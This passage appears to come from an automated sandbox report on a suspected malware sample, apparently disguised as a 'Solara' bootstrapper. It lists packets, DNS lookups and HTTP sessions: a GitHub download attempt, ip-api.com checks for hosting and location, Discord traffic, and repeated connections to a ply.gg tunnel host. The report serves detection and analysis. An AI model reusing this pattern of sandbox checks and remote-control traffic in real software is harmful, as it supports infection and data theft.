Aug 5, 2024 14:32:09.323292971 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.323374033 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.323379993 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.323404074 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.323451996 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.323457956 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.323951960 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.323982000 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.324013948 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.324021101 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.324027061 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.324050903 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.324584961 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.324615002 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.324636936 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.324661016 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.324666977 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.324686050 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.325181007 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.325361967 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.325370073 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.325454950 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.325500011 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.325505018 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.325557947 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.325608969 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.325614929 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.325954914 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.325978994 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.326003075 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.326025963 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.326034069 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.326174021 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.326443911 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.875607014 CEST	49734	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:09.880898952 CEST	80	49734	208.95.112.1	192.168.2.4
Aug 5, 2024 14:32:09.880994081 CEST	49734	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:09.881181955 CEST	49734	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:09.890079021 CEST	80	49734	208.95.112.1	192.168.2.4
Aug 5, 2024 14:32:10.346529961 CEST	80	49734	208.95.112.1	192.168.2.4
Aug 5, 2024 14:32:10.347238064 CEST	49734	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:10.353106976 CEST	80	49734	208.95.112.1	192.168.2.4
Aug 5, 2024 14:32:10.353575945 CEST	49734	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:34.715749979 CEST	49743	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:34.720889091 CEST	80	49743	208.95.112.1	192.168.2.4
Aug 5, 2024 14:32:34.721065998 CEST	49743	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:34.721105099 CEST	49743	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:34.726094007 CEST	80	49743	208.95.112.1	192.168.2.4
Aug 5, 2024 14:32:35.260183096 CEST	80	49743	208.95.112.1	192.168.2.4
Aug 5, 2024 14:32:35.328550100 CEST	49743	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:35.708416939 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:35.708451033 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:35.708514929 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:35.729988098 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:35.730007887 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.260209084 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.260759115 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.260780096 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.261874914 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.261982918 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.262804031 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.262881041 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263139009 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.263147116 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263226032 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.263250113 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263447046 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.263477087 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263607025 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.263641119 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263770103 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.263787985 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263801098 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.263811111 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263819933 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.263823986 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263904095 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.263912916 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263925076 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.263936043 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.263993025 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264000893 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264014959 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264023066 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264080048 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264086008 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264103889 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264116049 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264152050 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264163971 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264182091 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264192104 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264245033 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264256001 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264266968 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264282942 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264302015 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264326096 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264334917 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264384985 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264394999 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264414072 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264424086 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264461994 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264472961 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.264537096 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264599085 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264616013 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264646053 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.264703035 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273504972 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.273686886 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273703098 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.273719072 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273736000 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273756027 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273775101 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273797035 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273807049 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273859978 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273880005 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273910999 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.273961067 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.278418064 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.278584003 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.278601885 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:36.278616905 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.278641939 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.278656960 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.278671980 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.278683901 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:36.279329062 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:37.103621006 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:37.103770971 CEST	443	49744	162.159.135.233	192.168.2.4
Aug 5, 2024 14:32:37.103888988 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:37.104682922 CEST	49744	443	192.168.2.4	162.159.135.233
Aug 5, 2024 14:32:38.101581097 CEST	49743	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:38.107182026 CEST	80	49743	208.95.112.1	192.168.2.4
Aug 5, 2024 14:32:38.107259035 CEST	49743	80	192.168.2.4	208.95.112.1
Aug 5, 2024 14:32:45.694966078 CEST	49745	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:32:45.700442076 CEST	27573	49745	147.185.221.21	192.168.2.4
Aug 5, 2024 14:32:45.700520992 CEST	49745	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:32:45.847451925 CEST	49745	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:32:45.852427959 CEST	27573	49745	147.185.221.21	192.168.2.4
Aug 5, 2024 14:32:59.511298895 CEST	49745	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:32:59.516138077 CEST	27573	49745	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:07.095597982 CEST	27573	49745	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:07.095688105 CEST	49745	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:08.891120911 CEST	49745	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:08.892698050 CEST	49748	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:08.896039009 CEST	27573	49745	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:08.897701025 CEST	27573	49748	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:08.897763968 CEST	49748	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:08.936611891 CEST	49748	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:08.941490889 CEST	27573	49748	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:21.110171080 CEST	49748	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:21.115237951 CEST	27573	49748	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:30.264381886 CEST	27573	49748	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:30.264575005 CEST	49748	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:30.672528982 CEST	49748	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:30.675652027 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:30.747698069 CEST	27573	49748	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:30.747718096 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:30.747875929 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:30.923691034 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:31.053883076 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:42.813530922 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:42.818476915 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:46.485090017 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:46.490797043 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:50.844682932 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:50.850292921 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:53.047750950 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:53.328531981 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:53.401582003 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:53.401640892 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:53.402853012 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:53.402888060 CEST	49751	27573	192.168.2.4	147.185.221.21
Aug 5, 2024 14:33:53.405411959 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:53.405441046 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:53.407614946 CEST	27573	49751	147.185.221.21	192.168.2.4
Aug 5, 2024 14:33:53.408375978 CEST	27573	49751	147.185.221.21	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2024 14:32:05.788902998 CEST	51569	53	192.168.2.4	1.1.1.1
Aug 5, 2024 14:32:05.799179077 CEST	53	51569	1.1.1.1	192.168.2.4
Aug 5, 2024 14:32:07.258994102 CEST	63662	53	192.168.2.4	1.1.1.1
Aug 5, 2024 14:32:07.271002054 CEST	53	63662	1.1.1.1	192.168.2.4
Aug 5, 2024 14:32:07.342242956 CEST	61812	53	192.168.2.4	1.1.1.1
Aug 5, 2024 14:32:07.350220919 CEST	53	61812	1.1.1.1	192.168.2.4
Aug 5, 2024 14:32:09.863554001 CEST	54495	53	192.168.2.4	1.1.1.1
Aug 5, 2024 14:32:09.870932102 CEST	53	54495	1.1.1.1	192.168.2.4
Aug 5, 2024 14:32:34.534780025 CEST	64233	53	192.168.2.4	1.1.1.1
Aug 5, 2024 14:32:34.706140995 CEST	53	64233	1.1.1.1	192.168.2.4
Aug 5, 2024 14:32:35.568248987 CEST	63520	53	192.168.2.4	1.1.1.1
Aug 5, 2024 14:32:35.707571030 CEST	53	63520	1.1.1.1	192.168.2.4
Aug 5, 2024 14:32:45.651902914 CEST	63527	53	192.168.2.4	1.1.1.1
Aug 5, 2024 14:32:45.687215090 CEST	53	63527	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 5, 2024 14:32:05.788902998 CEST	192.168.2.4	1.1.1.1	0x395	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:07.258994102 CEST	192.168.2.4	1.1.1.1	0x6034	Standard query (0)	blank-curro.in	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:07.342242956 CEST	192.168.2.4	1.1.1.1	0xd23a	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:09.863554001 CEST	192.168.2.4	1.1.1.1	0xa706	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:34.534780025 CEST	192.168.2.4	1.1.1.1	0xf932	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:35.568248987 CEST	192.168.2.4	1.1.1.1	0xe1bc	Standard query (0)	discordapp.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:45.651902914 CEST	192.168.2.4	1.1.1.1	0x954c	Standard query (0)	cash-spoken.gl.at.ply.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 5, 2024 14:32:05.799179077 CEST	1.1.1.1	192.168.2.4	0x395	No error (0)	github.com		140.82.121.4	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:07.271002054 CEST	1.1.1.1	192.168.2.4	0x6034	Name error (3)	blank-curro.in	none	none	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:07.350220919 CEST	1.1.1.1	192.168.2.4	0xd23a	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:07.350220919 CEST	1.1.1.1	192.168.2.4	0xd23a	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:07.350220919 CEST	1.1.1.1	192.168.2.4	0xd23a	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:07.350220919 CEST	1.1.1.1	192.168.2.4	0xd23a	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:09.870932102 CEST	1.1.1.1	192.168.2.4	0xa706	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:34.706140995 CEST	1.1.1.1	192.168.2.4	0xf932	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:35.707571030 CEST	1.1.1.1	192.168.2.4	0xe1bc	No error (0)	discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:35.707571030 CEST	1.1.1.1	192.168.2.4	0xe1bc	No error (0)	discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:35.707571030 CEST	1.1.1.1	192.168.2.4	0xe1bc	No error (0)	discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:35.707571030 CEST	1.1.1.1	192.168.2.4	0xe1bc	No error (0)	discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:35.707571030 CEST	1.1.1.1	192.168.2.4	0xe1bc	No error (0)	discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
Aug 5, 2024 14:32:45.687215090 CEST	1.1.1.1	192.168.2.4	0x954c	No error (0)	cash-spoken.gl.at.ply.gg		147.185.221.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

raw.githubusercontent.com

discordapp.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	208.95.112.1	80	6252	C:\Users\user\AppData\Local\Temp\Built.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 14:32:09.881181955 CEST	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.2
Aug 5, 2024 14:32:10.346529961 CEST	175	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 12:32:09 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	208.95.112.1	80	6252	C:\Users\user\AppData\Local\Temp\Built.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 14:32:34.721105099 CEST	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.2
Aug 5, 2024 14:32:35.260183096 CEST	379	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 12:32:34 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 35 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	140.82.121.4	443	7248	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-05 12:32:06 UTC	105	OUT	GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-08-05 12:32:07 UTC	473	IN	HTTP/1.1 404 Not Found Server: GitHub.com Date: Mon, 05 Aug 2024 12:32:06 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
2024-08-05 12:32:07 UTC	3192	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
2024-08-05 12:32:07 UTC	445	IN	Data Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pre
2024-08-05 12:32:07 UTC	1370	IN	Data Raw: 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 20 20 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 Data Ascii: "> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="
